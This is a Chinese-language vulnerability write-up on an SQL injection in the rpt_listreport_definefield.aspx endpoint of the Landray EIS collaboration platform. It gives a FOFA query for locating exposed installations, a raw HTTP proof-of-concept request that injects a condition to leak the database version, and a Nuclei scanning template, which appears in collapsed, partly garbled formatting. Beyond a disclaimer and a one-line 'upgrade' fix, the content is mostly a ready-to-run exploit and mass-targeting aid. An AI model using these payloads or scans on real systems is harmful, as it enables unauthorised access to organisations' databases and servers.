免責聲明：文章來源互聯網收集整理，請勿利用文章內的相關技術從事非法測試，由于傳播、利用此文所提供的信息或者工具而造成的任何直接或者間接的后果及損失，均由使用者本人負責，所產生的一切不良后果與文章作者無關。該文章僅供學習用途使用。

Ⅰ、漏洞描述

藍凌EIS智慧協同平臺是一款專為企業提供高效協同辦公和團隊合作的產品。該平臺集成了各種協同工具和功能，旨在提升企業內部溝通、協作和信息共享的效率。

藍凌EIS智慧協同平臺 frpt_listreport_definefield.aspx接口處存在SQL注入漏洞，未經授權的攻擊者可能會利用此漏洞竊取服務器的敏感信息，最終導致服務器失陷

Ⅱ、fofa語句

icon_hash="953405444"||app="Landray-OA系統"

Ⅲ、漏洞復現

POC

GET /SM/rpt_listreport_definefield.aspx?ID=2%20and%201=@@version--+ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0

1、發送數據包，讀取數據庫版本信息

Ⅳ、Nuclei-POC

id: lanlingOA-definefield-SQLinfo:name: 藍凌EIS智慧協同平臺 frpt_listreport_definefield.aspx接口處存在SQL注入漏洞，未經授權的攻擊者可能會利用此漏洞竊取服務器的敏感信息，最終導致服務器失陷author: WLFseverity: highmetadata: fofa-query: icon_hash="953405444"||app="Landray-OA系統"
variables:filename: "{{to_lower(rand_base(10))}}"boundary: "{{to_lower(rand_base(20))}}"
http:- raw:- |GET /SM/rpt_listreport_definefield.aspx?ID=2%20and%201=@@version--+ HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Content-Length: 0matchers:- type: dsldsl:- status_code==500 && contains_all(body,"nvarchar")

Ⅴ、修復建議

升級至安全版本